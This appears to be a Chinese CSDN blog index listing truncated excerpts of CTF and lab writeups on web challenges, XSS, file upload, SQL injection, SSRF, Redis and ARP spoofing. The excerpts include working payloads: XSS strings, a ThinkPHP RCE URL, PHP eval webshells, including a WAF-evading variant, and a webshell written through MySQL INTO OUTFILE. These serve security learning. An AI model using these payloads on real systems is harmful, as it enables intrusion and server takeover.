- 博客(67)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 [蓝帽杯 2021]One Pointer PHP
题目给了源码:user.php<?phpclass User{ public $count;}?>add_api.php<?phpinclude "user.php";if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; if($count[]=1){ $user->count+=1; setcookie("data",serialize($user)); }el
2021-05-14 12:27:13
1376
11
原创 WEB_ezeval-wp
<?phphighlight_file(__FILE__);$cmd=$_POST['cmd'];$cmd=htmlspecialchars($cmd);$black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','include.
2021-05-11 22:07:13
183
原创 rcee-wp
直接看框内的代码,其他的无用长度限制的代码执行?command=ls /发现根目录存在flag?command=cat /f*直接读
2021-05-11 21:49:36
121
原创 redis未授权复现(二)
靶机vps:ubantu靶机ip:50.7.61.25安装一个rediswget http://download.redis.io/releases/redis-2.8.12.tar.gz tar -xzf redis-2.8.12.tar.gzcd redis-2.8.12makecd src./redis-cli -h出现帮助菜单即安装成功apt-get updateapt-get install redis-serverredis-server --port 8080
2021-05-01 09:03:38
139
2
原创 vulhub安装
Ubantu环境vulhub官网https://vulhub.org/sudo apt updatesudo apt install gitgit clone https://github.com/vulhub/vulhub.git docker安装sudo apt-get updateapt install curlcurl -sSL https://get.daocloud.io/docker | sh#使用国内镜像脚本一键安装apt install docker-c
2021-04-30 13:41:42
199
原创 apt-get update出错解决
如下报错dns解析的问题解决方法:sudo vi /etc/resolv.conf在文件末尾添加nameserver 8.8.8.8保存退出后,再次update成功执行
2021-04-25 16:18:27
227
原创 burpsuite2021.4安装问题
最近安装新版bp时遇到的一个问题我的java版本有点老了,先下个java16https://www.jb51.net/softs/767841.html安装完成后还是报同样的错解决方法:写个bat脚本java -jar --illegal-access=permit your_burpsuite_pro_v2021.4.jar_path注:记得替换your_burpsuite_pro_v2021.4.jar_path运行脚本成功运行...
2021-04-24 11:33:05
1408
5
原创 xss-labs笔记(四)
文章目录Less16Less17Less18Less19Less16过滤了script、/、空格只能使用不用/闭合的标签,例如<img>空格用回车绕过test payload<imgscr=1onerror=alert(1)>payload?keyword=<img%0asrc=1%0aonerror=alert(1)>Less17利用get请求在embed标签中插入一个事件,比如onclick、onmouseover等payload
2021-01-27 17:11:18
235
原创 xss-labs笔记(三)
文章目录Less11Less12Less13Less14Less15Less11和less10一样,有四个隐藏表单尝试像less10一样构造test payloadhttp://localhost/xss-labs/level11.php?keyword=1&t_link=1&t_history=2&t_sort=3&t_ref=4payload 1keyword=1&t_link=1&t_history=2&t_sort="oncli
2021-01-27 15:28:16
662
原创 xss-labs笔记(二)
文章目录Less6Less7Less8Less6尝试直接使用less5的payload1"/><a href="javascript:alert(1)好家伙href属性被替换了看一眼源码$str2=str_replace("<script","<scr_ipt",$str);$str3=str_replace("on","o_n",$str2);$str4=str_replace("src","sr_c",$str3);$str5=str_replace("dat
2021-01-24 19:33:30
313
原创 SSRF学习-gopher协议学习
pikachu靶场cURL0x01 读文件http://localhost/pikachu/vul/ssrf/ssrf_curl.php?url=file://c:/test.txt0x02 探测主机端口信息http://localhost/pikachu/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1:3306/infofile_get_content读文件php伪协议读文件(待续)...
2020-12-27 11:44:22
506
原创 攻防世界-php2
一开始拿到这个网页,用了各种信息收集都没有用后来花了两大洋看wp,原来还有个phps文件新知识,赶紧加到字典里去phps是专门提供源码给用户看而设立的后缀简单的代码审计只要将‘admin’url编码两次就行了?id=%2561%2564%256d%2569%256e...
2020-12-24 10:26:48
109
原创 bugku-web34
看到这个第一反应是文件包含尝试包含index.php看看源码这里有文件包含与文件上传两个漏洞的话,岂不是可以直接上传图片马然后解析?写一个一句话试一下GIF89a<?php phpinfo(); eval($_POST['test']);?>包含的时候发现<?php ?>一头一尾不见了,应该是被替换了那我们可以这样写<script language="php">phpinfo();@eval($_POST['test']);<.
2020-12-23 17:16:14
595
6
原创 bugku-web29
<?phphighlight_file('flag.php');$_GET['id'] = urldecode($_GET['id']);$flag = 'flag{xxxxxxxxxxxxxxxxxx}';if (isset($_GET['uname']) and isset($_POST['passwd'])) { if ($_GET['uname'] == $_POST['passwd']) print 'passwd can not be uname.';
2020-12-23 16:30:46
180
原创 bugku-web24
先看源码<?phpif(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1) == md5($v2)){ if(!strcmp($v3, $flag)){
2020-12-23 15:57:40
261
原创 bugku-web23
<?php highlight_file('2.php');$key='flag{********************************}';$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);if( $IM ){ die('key is: '.$key);}?>关键是匹配这个正则表达式匹配上了就出flag对于正则表达式不
2020-12-23 15:31:25
273
原创 bugku-web30
<?phpextract($_GET);if (!empty($ac)){$f = trim(file_get_contents($fn));if ($ac === $f){echo "<p>This is flag:" ." $flag</p>";}else{echo "<p>sorry!</p>";}}?>这题应该是考php://input协议此协议需要allow_url_include为on,可以访问请求的原
2020-12-23 11:13:32
390
1
原创 bugku-web25
以admin/1234Ab注册,显示用户已存在提示说sql约束攻击现在表中有admin,假设字段是varchar(10)那我们注册admin后面接超过字段长度的空格,mysql就会截取前面10位数据,从而达到再插入一个admin的效果本地实验:尝试插入...
2020-12-22 15:35:23
258
原创 bugku-web22
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])explode("#",$poc);将$poc以#为分界符号分为数组$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5].
2020-12-21 13:29:04
528
2
原创 mysql拿shell
一般前提:有权限,有绝对路径一般写文件select 0x3c3f70687020406576616c28245f504f53545b2774657374275d293f3e into outfile'D:\\phpstudy_pro\\WWW\\shell.php';以sqli-labs第七关为例虽然这里报错了,但是文件还是写进去了后面就可以用菜刀连接了...
2020-12-18 20:45:58
588
1
原创 mysql注入-tips
(1)database()、version()、user()查询技巧CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())可以在一个注入点同时爆出三个信息例如:union select 1,2,3%23(2是注入点的话)union select 1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3%23就可以爆出三个信息...
2020-12-18 18:08:09
125
1
原创 xss-labs笔记(一)
明天考试啦,先做个靶场压压惊:vxsslabs的靶场好像挂了(csdn提供的下载居然要几十C币,啊这)给个网盘吧https://cloud.189.cn/t/YjMZ7bVb2QFr靶场解压直接放到phpstudy的根目录下就行了文章目录level1level2level3level4level5level1url上有个参数,直接<script>alert(1)</script>试下直接弹窗,nice看看源码$str = $_GET["name"];echo
2020-12-18 12:34:43
196
原创 尝试写第一个脚本(bugku速度要快)
import requestsimport base64url ="http://114.67.246.176:12562/"s=requests.session()a=s.get(url).headersprint(a['flag'])b=a['flag']c=str(b[-12:])print(c)e=base64.b64decode(bytes(b[-12:], 'utf-8'))print(e)h={'margin':e}rep=s.post(url,data=h)prin
2020-12-17 13:01:26
116
原创 写python脚本遇到的些许小问题
base64报错TypeError: expected bytes-like object, not str语句写错了…例子:a='dGhpcyBpcyBhIGV4YW1wbGU='b=base64.b64decode(bytes(a, 'utf-8'))print(b)c=base64.b64encode(bytes('this is a example', 'utf-8'))print(c)
2020-12-17 00:22:00
163
原创 从脚本学python(秋名山车神)
最近做bugku的时候,做到秋名山车神那题,连python都不会(泪)很惭愧https://zhuanlan.zhihu.com/p/141333473脚本代码来自上面这个writeupimport requests url ="http://123.206.87.240:8002/qiumingshan/"s = requests.Session()req = s.get(url)a = req.text[req.text.find('<div>')+5:req.text.fin
2020-12-16 20:45:47
522
原创 将phpstudy的Apache注册为服务
首先进入管理员powershell.\httpd.exe -k -n apache2.4-n 后面是名字参数,可以任意输入
2020-12-14 08:56:11
697
1
原创 ics-06
只有这一个页面可以进来,扫他后台也没什么收获对着这个id用sql打了半天,一点用没有无奈百度,居然是爆破,啊这尝试访问http://220.249.52.134:45788/index.php?id=2333
2020-12-13 19:00:16
68
1
原创 [强网杯]easy_sqli
环境:攻防世界order by 3报错说明有两个字段尝试union select有很多关键字被ban了,那只能堆叠注入了暴库http://220.249.52.134:33346/?inject=-1';show databases;--+ctftraininginformation_schemamysqlperformance_schemasupersqlitest暴ctftraining的表http://220.249.52.134:33346/?inject=-1
2020-12-13 18:08:59
750
1
原创 upload-labs笔记
文章目录0x01 前端js检查0x02 MIME检查0x030x040x01 前端js检查前端js验证将一句话的扩展名改一下将扩展名.jpg删除即可0x02 MIME检查直接上传php按照上一题方法照样可以上传看提示说是对mime类型进行检查,看看源码$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { if (($_
2020-12-12 11:53:58
169
1
原创 (4)python文件处理
open()python内置了文件对象,通过open()可以打开指定文件,并创建文件对象函数格式:open(file[,mode='r'[,buffering=-1]])参数含义:file指定要打开的文件的名称,如不在当前目录,需指出绝对路径mode打开文件后的处理方式,有读、写、追加、二进制、文本、读写模式等buffering指定读写文件的缓冲模式,0表示不缓存,1表示用缓存模式,大于1表示缓冲区的大小,默认-1(二进制文本文件以固定大小的块作为缓冲单位,等价于io)w:写入模式。
2020-12-09 19:05:57
62
原创 (3)python控制结构
文章目录选择结构选择结构if分支语句实例:输入一个分数,小于60输出不及格,介于60到90之间输出良好,大于90输出优秀sorce=int(input(‘Please input your sorce:’))if(sorce<60):print(‘不及格’)if(sorce)...
2020-12-09 17:13:33
103
原创 (2)python字典常用操作方法
字典中的元素是以 键:值 的形式存在一个键对应一个值,值可以有重复的,但键必须是唯一的文章目录dict()创建字典修改字典中的元素添加新元素返回字典中的所有元素删除字典中的元素dict()创建字典格式:字典名 = dict(键名=‘值’,键名=‘值’,…)跟一般创建字典的方法不同的是,键名可以不用单引号包裹,可以用=赋值修改字典中的元素格式:字典名[‘键名’]=‘值’dic['os']='linux' #将dic字典中的os键的值改为linux添加新元素格式:字典名[‘键名
2020-12-09 16:12:55
57
原创 (1)python列表常用操作方法
文章目录list()创建列表删除列表0x1 删除单个元素0x02 删除整个列表对象0x03 删除列表中首次出现的元素0x04 删除并返回列表中指定下标的元素添加元素0x01 在列表尾部添加单个元素0x02 在列表末尾添加列表0x03 在指定位置添加元素返回指定元素在列表中出现的次数将列表中的所有元素逆序对列表中的元素进行排序list()list()可将元组、字符串、字典或其他类型转化为列表example=list((1,2,3))创建列表格式:列表名=[‘元素1’,‘元素2’]student
2020-12-09 15:37:37
86
原创 netfuke-arp欺骗
虚拟机ipxp192.168.59.129win2003192.168.59.134网关192.168.59.2使用xp攻击win2003(在同局域网)如图设置,注意网卡选择同网段的ip开始攻击成功
2020-12-05 15:51:10
635
原创 攻防世界-php_rce
这题是thinkPHP v5的一个RCE漏洞payload:?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=lspayload最末尾出是命令执行文件都cat了一遍没什么收获往上级目录再看看payload:?s=index/\think\app/invokefunction&function=call_user_func_array&a
2020-12-04 18:27:32
142
原创 攻防世界-Web_php_include
0x01payload:?page=data: text/plain,<?php @eval($_POST['test']);?>直接输入菜刀连接即可0x02使用data://text/plain协议payload:?page=data: text/plain,<?php system(ls); ?>
2020-12-04 18:21:16
91
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人